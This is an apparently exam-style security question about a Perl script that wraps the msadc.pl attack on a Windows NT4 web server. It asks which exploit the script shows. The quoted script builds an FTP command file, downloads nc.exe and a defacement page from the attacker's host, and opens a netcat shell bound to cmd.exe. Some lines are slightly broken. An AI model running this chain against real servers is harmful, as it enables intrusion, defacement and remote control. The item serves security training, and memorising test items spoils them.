A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); system("perl msadc.pl -h $host -C \"echo $user>>testfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>testfile\""); system("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\"");
("perl msadc.pl -h $host -C \"echo quit>>testfile\"");
system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\"");
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
Which exploit is indicated by this script?
Comments